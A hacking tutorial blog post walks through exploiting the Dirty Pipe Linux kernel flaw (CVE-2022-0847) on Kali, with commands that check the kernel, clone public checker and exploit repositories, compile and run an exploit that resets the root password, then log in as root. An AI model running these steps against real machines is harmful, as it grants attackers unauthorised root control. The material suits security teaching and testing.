Privilege Escalation: The Dirty Pipe Exploit to Escalate Privileges on Linux Systems

Welcome back, my aspiring cyberwarriors!

Often, after successfully compromising a system, we are limited to the privilege’s of the compromised user. Regular users on systems usually have very limited privileges and can not access many of the resources or make changes to their systems and resources (databases, etc.). This is one of the many ways that good system administrators secure their networks.

1. Kernel Exploits

2. SUID/SGID misconfigurations

3. sudo

4. commands with escape characters

5. Service Exploits

6. Weak File Permissions

7. Environment Variables

8. Abusing Intended Functionality

In this tutorial, we will examine a kernel exploit privilege escalation exploit named DirtyPipe. It was found by Max Kellerman and assigned CVE-2022-0847.

DirtyPipe is a local privilege escalation vulnerability in the Linux kernel that allows a local attacker to bypass ANY file permissions, and write arbitrary data to any file under certain conditions. This means that files such as /etc/shadow, where password hashes are stored on the system can be overwritten with a new password.

Let’s test this potential local Privilege Escalation exploit on Kali 2021.

Step #1: Testing for the Vulnerability

The first step is determine whether your Linux kernel is vulnerable to Dirty Pipe. In this case, I’m using Kali 2021.

We know that the Linux kernel after 5.8 is vulnerable and that this vulnerability was patched in 5.16. We can identify the Linux kernel version by using the uname command in Linux.

kali > uname -a

 

As you can see this version of Kali uses the Linux kernel 5.10.0. This may make it vulnerable to Dirty Pipe as this release is between the first kernel version vulnerable and the patched kernel versions!

 

To be more certain, let’s download the DirtyPipe checker. It is available at https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker

kali > sudo git clone https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker

kali> cd CVE-2022-0847-dirty-pipe-checker

Now, execute the dpipe.sh script

kali > sudo dpipe.sh

 

As you can see above, this vulnerability checker confirmed that this Linux kernel is vulnerable to the Dirty Pipe privilege escalation exploit!

Step #2: Download the Exploit

Now that we know that this Linux version is vulnerable, let’s attempt to exploit it to get root privileges.

First, download the exploit;

kali > sudo git clone https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits

Next, navigate to the new directory.

Now that we are in that directory, let’s look inside.

kali > ls -l

 

As you can see above, there are two exploits and one compile script. We need to run the compile script to use these exploits. The compile script will compile both exploits automatically.

kali > sudo ./compile.sh

 

After you do so, the two exploits will turn green and be ready to execute.

Let’s run exploit-1 first.

kali> sudo ./exploit-1

 

It appears to have worked and changed the root password to “piped”!

Step #3: Login as Root

Let’s now test to see whether we can login as root.

kali> su root

Next, enter the new password “piped”

After doing so, enter the Linux command whoami;

#whoami

root

 

To further confirm that you have root privileges, trying running the Linux command id

#id

uid=0(root) groups=0(root), ……..

Success! Now you have root privileges on the system and can do whatever you want!

Summary

Escalating privileges is one of the key skills of a penetration tester/hacker. In many cases, we exploit an ordinary user without the privileges we need to take control of the system/network. The DirtyPipe kernel exploit is an excellent tool to escalate privileges of Linux systems released in approximately 2021-2022.